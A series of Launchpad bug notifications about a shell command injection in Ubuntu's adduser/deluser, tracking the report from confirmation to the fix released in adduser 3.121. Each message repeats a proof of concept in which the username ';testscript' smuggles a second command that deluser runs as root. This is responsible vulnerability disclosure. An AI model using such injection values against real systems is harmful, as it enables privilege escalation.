[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
It's fixed in Debian by version 3.121 and therefore fixed in adduser 3.121ubuntu1 in Ubuntu 22.10 (kinetic). ** Changed in: adduser (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Fix Released Status in adduser package in Debian: Fix Released Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -- Proof of concept # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw--- 1 root root 0 Jul 31 10:25 /test-file system description Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
** Changed in: adduser (Debian) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Confirmed Status in adduser package in Debian: Fix Released Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -- Proof of concept # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw--- 1 root root 0 Jul 31 10:25 /test-file system description Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
** Changed in: adduser (Debian) Status: Confirmed => Fix Committed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Confirmed Status in adduser package in Debian: Fix Committed Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -- Proof of concept # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw--- 1 root root 0 Jul 31 10:25 /test-file system description Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
** Changed in: adduser (Debian) Status: New => Confirmed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Confirmed Status in adduser package in Debian: Confirmed Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -- Proof of concept # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw--- 1 root root 0 Jul 31 10:25 /test-file system description Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
** Changed in: adduser (Debian) Status: Unknown => New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Confirmed Status in adduser package in Debian: New Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -- Proof of concept # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw--- 1 root root 0 Jul 31 10:25 /test-file system description Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
Thanks! ** Also affects: adduser (Debian) via https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577 Importance: Unknown Status: Unknown ** Changed in: adduser (Ubuntu) Status: Incomplete => Confirmed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Confirmed Status in adduser package in Debian: Unknown Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -- Proof of concept # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw--- 1 root root 0 Jul 31 10:25 /test-file system description Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
Hi, I have reported this bug to Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577 Warm regards, Haoxi On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers < marc.deslauri...@canonical.com> wrote: > Hi! Have you had a chance to report this issue to Debian? > > ** Changed in: adduser (Ubuntu) >Status: New => Incomplete > > ** Information type changed from Private Security to Public Security > > -- > You received this bug notification because you are subscribed to the bug > report. > https://bugs.launchpad.net/bugs/1838489 > > Title: > adduser & deluser shell command injection > > Status in adduser package in Ubuntu: > Incomplete > > Bug description: > deluser program is vulnerable to a command injection vulnerability > when a user is added via adduser with special characters (such as > ';'). It is only possible when the user exists on the system (adduser > does not prevent usernames with ';' to be added.) > > This can be a security risk when user accounts on the system can be > created from arbitrary input, and there are exploitable programs in > PATH to make privilege escalation possible. > > -- Proof of concept > > # ll /test-file > ls: cannot access '/test-file': No such file or directory > > # cat /usr/bin/testscript > #!/bin/bash > touch /test-file > > # deluser > Enter a user name to remove: ;testscript > no crontab for root > crontab: usage error: no arguments permitted after this option > usage: crontab [-u user] file > crontab [ -u user ] [ -i ] { -e | -l | -r } > (default operation is replace, per 1003.2) > -e (edit user's crontab) > -l (list user's crontab) > -r (delete user's crontab) > -i (prompt before deleting user's crontab) > /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code > 1. Exiting. > (failed reverse-i-search)`': deluser^C ># ll /test-file > -rw--- 1 root root 0 Jul 31 10:25 /test-file > > > system description > > Description: Ubuntu 18.04.2 LTS > Release: 18.04 > > # apt-cache policy adduser > adduser: > Installed: 3.116ubuntu1 > Candidate: 3.116ubuntu1 > Version table: >*** 3.116ubuntu1 500 > 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages > 100 /var/lib/dpkg/status > > To manage notifications about this bug go to: > > https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions > ** Bug watch added: Debian Bug tracker #940577 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Incomplete Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -- Proof of concept # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw--- 1 root root 0 Jul 31 10:25 /test-file system description Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
Hi Marc, I will do it tonight. Will tell you once it’s done :) On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers < marc.deslauri...@canonical.com> wrote: > Hi! Have you had a chance to report this issue to Debian? > > ** Changed in: adduser (Ubuntu) >Status: New => Incomplete > > ** Information type changed from Private Security to Public Security > > -- > You received this bug notification because you are subscribed to the bug > report. > https://bugs.launchpad.net/bugs/1838489 > > Title: > adduser & deluser shell command injection > > Status in adduser package in Ubuntu: > Incomplete > > Bug description: > deluser program is vulnerable to a command injection vulnerability > when a user is added via adduser with special characters (such as > ';'). It is only possible when the user exists on the system (adduser > does not prevent usernames with ';' to be added.) > > This can be a security risk when user accounts on the system can be > created from arbitrary input, and there are exploitable programs in > PATH to make privilege escalation possible. > > -- Proof of concept > > # ll /test-file > ls: cannot access '/test-file': No such file or directory > > # cat /usr/bin/testscript > #!/bin/bash > touch /test-file > > # deluser > Enter a user name to remove: ;testscript > no crontab for root > crontab: usage error: no arguments permitted after this option > usage: crontab [-u user] file > crontab [ -u user ] [ -i ] { -e | -l | -r } > (default operation is replace, per 1003.2) > -e (edit user's crontab) > -l (list user's crontab) > -r (delete user's crontab) > -i (prompt before deleting user's crontab) > /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code > 1. Exiting. > (failed reverse-i-search)`': deluser^C ># ll /test-file > -rw--- 1 root root 0 Jul 31 10:25 /test-file > > > system description > > Description: Ubuntu 18.04.2 LTS > Release: 18.04 > > # apt-cache policy adduser > adduser: > Installed: 3.116ubuntu1 > Candidate: 3.116ubuntu1 > Version table: >*** 3.116ubuntu1 500 > 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages > 100 /var/lib/dpkg/status > > To manage notifications about this bug go to: > > https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions > -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Incomplete Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -- Proof of concept # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw--- 1 root root 0 Jul 31 10:25 /test-file system description Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1838489] Re: adduser & deluser shell command injection
Hi! Have you had a chance to report this issue to Debian? ** Changed in: adduser (Ubuntu) Status: New => Incomplete ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Incomplete Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -- Proof of concept # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw--- 1 root root 0 Jul 31 10:25 /test-file system description Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp